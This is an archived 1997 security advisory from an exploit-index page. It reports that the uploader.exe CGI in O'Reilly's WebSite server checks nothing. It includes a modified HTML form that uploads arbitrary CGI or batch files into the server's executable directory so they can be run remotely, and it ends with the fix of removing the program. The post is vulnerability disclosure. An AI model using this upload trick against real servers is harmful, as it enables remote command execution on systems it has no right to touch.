Uploader.exe insecurity

Summary
Description:pathetic insecurity in uploader.exe that comes with O'reilly's webserver 'website'
Author:Herman de Vette <herman@info.nl>
Compromise:run arbitrary commands on the web server (by placing arbitrary cgi scripts there)
Vulnerable Systems:Those running O'reilly's webserver, website. Mostly Windoze NT and W95 boxes. Some versions of 1.1 and 2.0beta have this vulnerability.
Date:4 September 1997
Details


Date: Thu, 4 Sep 1997 21:38:57 +0200
From: Herman de Vette <herman@info.nl>
To: NTBUGTRAQ@NTADVICE.COM
Subject: [Alert] Website's uploader.exe (from demo) vulnerable

[Alert] Website's uploader.exe (from demo) vulnerable

Check out what I found today (hope it's not an known bug yet)

O'reilly's webserver 'website' contains a demopackage that contains
the cgi-program uploader.exe. The following html-page was included with
it:
----------------------------------------
<HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>

<BODY>

<H1>Upload a file</H1>

<hr>

<h2>NOTE: Your browser must support file uploading.</H2>

<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="/cgi-win/uploader.exe/Uploads/">

<PRE>Your name:        <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)

Email address:    <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)

                  <b>NOTE:</b> If you don't see a "browse" button below,
your browser

                  doesn 't support form-based file uploading. Netscape
2.0 and

                  later have this support.

File to upload:   <INPUT TYPE=FILE NAME="upl-file" SIZE=40>

File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)

                  <INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>

</FORM>

<HR>

<A HREF="mailto:...">

<address>...</address>

</A></BODY></HTML>

-----------------------------------------

The program uploader.exe doesn't check anything at all. If you're lucky
you're running windows NT
and have put only "read/execute access" on cgi-win and other executable
paths. Otherwise (win95) you
have a real problem. You could create a CGI-program, next you change the
HTML-file a little like this:

-----------------------------------------
<HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>

<BODY>

<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">

  <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">

  <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com>

  File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>

  <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">

  <INPUT TYPE=SUBMIT VALUE="Upload Now">

</FORM>

</BODY></HTML>
------------------------------------------

open the html-file in your browser, select a nice CGI-file to upload
And run that CGI-program remotely. (No need to tell you what this
CGI-program could do,
could be .bat file too in one of website's other cgi-directories)

SOLUTION: remove uploader.exe, delete it, empty your trash bin and use
ftp for file-upload

Herman de Vette
herman@info.nl

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault